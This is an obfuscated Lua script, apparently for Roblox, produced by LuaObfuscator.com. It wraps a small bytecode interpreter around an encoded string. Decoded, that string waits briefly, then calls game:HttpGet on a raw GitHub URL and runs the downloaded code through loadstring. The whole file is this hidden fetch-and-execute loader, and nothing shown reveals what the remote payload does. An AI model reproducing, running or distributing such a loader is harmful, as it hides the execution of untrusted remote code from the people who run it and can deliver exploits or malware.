--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v115=v5(v85,v19);v19=nil;return v115;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -(1 + 0)))) + (620 -(555 + 64)))) ;return v86-(v86%(932 -((1734 -(282 + 595)) + 74))) ;else local v87=((2207 -(1523 + 114)) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or 0 ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * 256) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1068 -(68 + 997)) );v18=v18 + ((283 + 991) -(226 + 1044)) ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(32 + 85))) + (v38 * (251 + 5)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,1,977 -(892 + 65) ) * ((4 -2)^((849 -(368 + 423)) -26))) + v41 ;local v45=v20(v42,38 -17 ,381 -(87 + 263) );local v46=((v20(v42,(37 + 175) -(67 + 113) )==((1 -0) + 0)) and  -(2 -1)) or ((3 -2) + 0) ;if (v45==(0 -0)) then if (v44==(952 -(802 + 150))) then return v46 * 0 ;else local v116=0 -0 ;while true do if (v116==(0 -0)) then v45=1 + 0 + 0 ;v43=997 -(915 + 82) ;break;end end end elseif (v45==2047) then return ((v44==(0 -0)) and (v46 * ((1 + 0)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2210 -(1069 + 118)) ) * (v43 + (v44/((4 -2)^(113 -61)))) ;end local function v25(v47) local v48;if  not v47 then local v88=18 -(10 + 8) ;while true do if (v88==(0 -0)) then v47=v23();if (v47==((190 + 252) -(416 + 26))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v66=3 -2 , #v48 do v49[v66]=v2(v1(v3(v48,v66,v66)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 0;end)();local v90=(function() return;end)();local v91=(function() return;end)();while true do if (v89~= #"{") then else if (v90== #"\\") then v91=(function() return v92()~=0 ;end)();elseif (v90==2) then v91=(function() return v93();end)();elseif (v90~= #"xnx") then else v91=(function() return v94();end)();end v95[v96]=(function() return v91;end)();break;end if (v89~=(688 -(198 + 490))) then else local v122=(function() return 0;end)();local v123=(function() return;end)();while true do if (v122~=0) then else v123=(function() return 0 -0 ;end)();while true do if (v123==0) then v90=(function() return v92();end)();v91=(function() return nil;end)();v123=(function() return 2 -1 ;end)();end if (v123==(1207 -(696 + 510))) then v89=(function() return  #".";end)();break;end end break;end end end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v51=(function() return function(v97,v98,v99,v100,v101,v102,v103,v104,v105) local v106=(function() return 0;end)();local v97=(function() return;end)();local v98=(function() return;end)();while true do if (v106~=(1 -0)) then else local v124=(function() return 0;end)();while true do if (v124==(1262 -(1091 + 171))) then while true do if (v97==(0 + 0)) then v98=(function() return v99();end)();if (v100(v98, #"!", #"!")==(0 -0)) then local v172=(function() return 0 -0 ;end)();local v173=(function() return;end)();local v174=(function() return;end)();local v175=(function() return;end)();while true do if (v172==(375 -(123 + 251))) then v175=(function() return {v101(),v101(),nil,nil};end)();if (v173==(698 -(208 + 490))) then local v185=(function() return 0 + 0 ;end)();local v186=(function() return;end)();while true do if (0~=v185) then else v186=(function() return 0;end)();while true do if (v186==0) then v175[ #"91("]=(function() return v101();end)();v175[ #"asd1"]=(function() return v101();end)();break;end end break;end end elseif (v173== #">") then v175[ #"91("]=(function() return v102();end)();elseif (v173==(1 + 1)) then v175[ #"xxx"]=(function() return v102() -((838 -(660 + 176))^(2 + 14)) ;end)();elseif (v173== #"gha") then local v194=(function() return 0;end)();local v195=(function() return;end)();while true do if (v194~=0) then else v195=(function() return 0;end)();while true do if (v195==(202 -(14 + 188))) then v175[ #"gha"]=(function() return v102() -((677 -(534 + 141))^16) ;end)();v175[ #"?id="]=(function() return v101();end)();break;end end break;end end end v172=(function() return 2;end)();end if (v172==(2 + 1)) then if (v100(v174, #"xnx", #"19(")== #"\\") then v175[ #"?id="]=(function() return v103[v175[ #"asd1"]];end)();end v104[v105]=(function() return v175;end)();break;end if (v172==(2 + 0)) then if (v100(v174, #"!", #"!")~= #">") then else v175[2]=(function() return v103[v175[2]];end)();end if (v100(v174,2 + 0 ,3 -1 )~= #":") then else v175[ #"91("]=(function() return v103[v175[ #"-19"]];end)();end v172=(function() return 4 -1 ;end)();end if (v172~=(0 -0)) then else local v184=(function() return 0 + 0 ;end)();while true do if (v184==(1 + 0)) then v172=(function() return 397 -(115 + 281) ;end)();break;end if (v184~=0) then else v173=(function() return v100(v98,4 -2 , #"asd");end)();v174=(function() return v100(v98, #".com",5 + 1 );end)();v184=(function() return 1;end)();end end end end end break;end end return v97,v98,v99,v100,v101,v102,v103,v104,v105;end end end if (v106==(0 -0)) then local v125=(function() return 0;end)();while true do if (v125==(3 -2)) then v106=(function() return 868 -(550 + 317) ;end)();break;end if (v125==0) then v97=(function() return 0 -0 ;end)();v98=(function() return nil;end)();v125=(function() return 1 -0 ;end)();end end end end end;end)();local v52=(function() return function(v107,v108,v109) local v110=(function() return 0 -0 ;end)();local v111=(function() return;end)();while true do if (v110==0) then v111=(function() return 0;end)();while true do if (v111~=(285 -(134 + 151))) then else local v126=(function() return 1665 -(970 + 695) ;end)();while true do if ((0 -0)==v126) then v107[v108-#"<" ]=(function() return v109();end)();return v107,v108,v109;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #"\\",v57 do FlatIdent_6D4CB,Type,Cons,v21,v24,v25,v58,v68=(function() return v50(FlatIdent_6D4CB,Type,Cons,v21,v24,v25,v58,v68);end)();end v56[ #"asd"]=(function() return v21();end)();for v69= #"{",v23() do FlatIdent_12703,Descriptor,v21,v20,v22,v23,v58,v53,v69=(function() return v51(FlatIdent_12703,Descriptor,v21,v20,v22,v23,v58,v53,v69);end)();end for v70= #"~",v23() do v54,v70,v28=(function() return v52(v54,v70,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[1992 -(582 + (1992 -(57 + 527))) ];local v65=v60[3];return function(...) local v71=v63;local v72=v64;local v73=v65;local v74=v27;local v75=3 -2 ;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -(3 -2) ;local v80={};local v81={};for v112=1824 -(1195 + 629) ,v79 do if (v112>=v73) then v77[v112-v73 ]=v78[v112 + (1 -0) ];else v81[v112]=v78[v112 + (242 -(187 + 54)) ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[781 -((1589 -(41 + 1386)) + 618) ];if (v84<=(4 + 1)) then if (v84<=(2 + 0)) then if (v84<=0) then do return;end elseif (v84>(1 -(103 -(17 + 86)))) then local v133=v83[(2 + 0) -0 ];v81[v133](v81[v133 + 1 + 0 ]);else local v134=v83[1638 -(1373 + 263) ];local v135,v136=v74(v81[v134](v13(v81,v134 + (1001 -(451 + 549)) ,v83[1 + 2 ])));v76=(v136 + v134) -(1 -0) ;local v137=0 -0 ;for v164=v134,v76 do local v165=0;while true do if (v165==(1384 -(746 + (1422 -784)))) then v137=v137 + 1 + 0 ;v81[v164]=v135[v137];break;end end end end elseif (v84<=(4 -1)) then v81[v83[2]]=v83[344 -(218 + 123) ];elseif (v84==(1585 -(1535 + 46))) then local v138=0;local v139;local v140;while true do if ((v138==((0 -0) + 0)) or (74>=143)) then v139=v83[1 + 1 ];v140=v81[v83[563 -(306 + 254) ]];v138=(167 -(122 + 44)) + 0 ;end if ((18<2112) and (v138==(1 -0))) then v81[v139 + (1468 -(899 + 568)) ]=v140;v81[v139]=v140[v83[3 + 1 ]];break;end end else local v141;local v142,v143;local v144;local v145;v81[v83[4 -2 ]]=v83[3];v75=v75 + (604 -(268 + 335)) ;v83=v71[v75];v145=v83[(503 -211) -(60 + 230) ];v81[v145](v81[v145 + (573 -(426 + 146)) ]);v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v62[v83[1459 -(282 + 1174) ]];v75=v75 + (812 -(569 + (802 -560))) ;v83=v71[v75];v145=v83[2];v144=v81[v83[8 -5 ]];v81[v145 + 1 + 0 ]=v144;v81[v145]=v144[v83[1028 -(706 + 259 + 59) ]];v75=v75 + (1252 -(105 + 616 + 530)) ;v83=v71[v75];v81[v83[1273 -(945 + 326) ]]=v83[7 -4 ];v75=v75 + 1 + 0 ;v83=v71[v75];v145=v83[702 -(271 + 429) ];v142,v143=v74(v81[v145](v13(v81,v145 + 1 + 0 ,v83[1503 -((2852 -1444) + 92) ])));v76=(v143 + v145) -(1087 -(461 + 625)) ;v141=1288 -(993 + 295) ;for v166=v145,v76 do v141=v141 + 1 + 0 ;v81[v166]=v142[v141];end v75=v75 + (1172 -(418 + 753)) ;v83=v71[v75];v145=v83[2];v81[v145]=v81[v145](v13(v81,v145 + 1 + 0 ,v76));v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[1 + 1 ]]();v75=v75 + (66 -(30 + 35)) + 0 + 0 ;v83=v71[v75];v75=v83[1260 -(1043 + 214) ];end elseif (v84<=(30 -22)) then if (v84<=(535 -(406 + 123))) then v81[v83[1771 -((2961 -(323 + 889)) + 20) ]]=v62[v83[1 + 2 ]];elseif ((1097<=1628) and (v84>(1329 -(1249 + 73)))) then v75=v83[2 + 1 ];elseif ((4630==4630) and (v81[v83[1147 -(466 + (1827 -1148)) ]]==v83[9 -5 ])) then v75=v75 + 1 ;else v75=v83[8 -5 ];end elseif (v84<=(1909 -(106 + 1794))) then local v131=v83[2];v81[v131]=v81[v131](v13(v81,v131 + 1 ,v76));elseif (v84==(4 + 6)) then for v169=v83[(581 -(361 + 219)) + 1 ],v83[8 -5 ] do v81[v169]=nil;end else v81[v83[5 -3 ]]();end v75=v75 + ((435 -(53 + 267)) -(4 + 110)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!073O00028O0003043O00776169742O033O00302E32030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403473O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F456E646F726F6C6F682F46544E2F726566732F68656164732F6D61696E2F4E2O6F6269657300163O0012033O00014O000A000100013O0026073O0002000100010004083O00020001001203000100013O00260700010005000100010004083O00050001001206000200023O001205000300036O00020002000100122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001500010004083O000500010004083O001500010004083O000200016O00017O00",v9(),...);
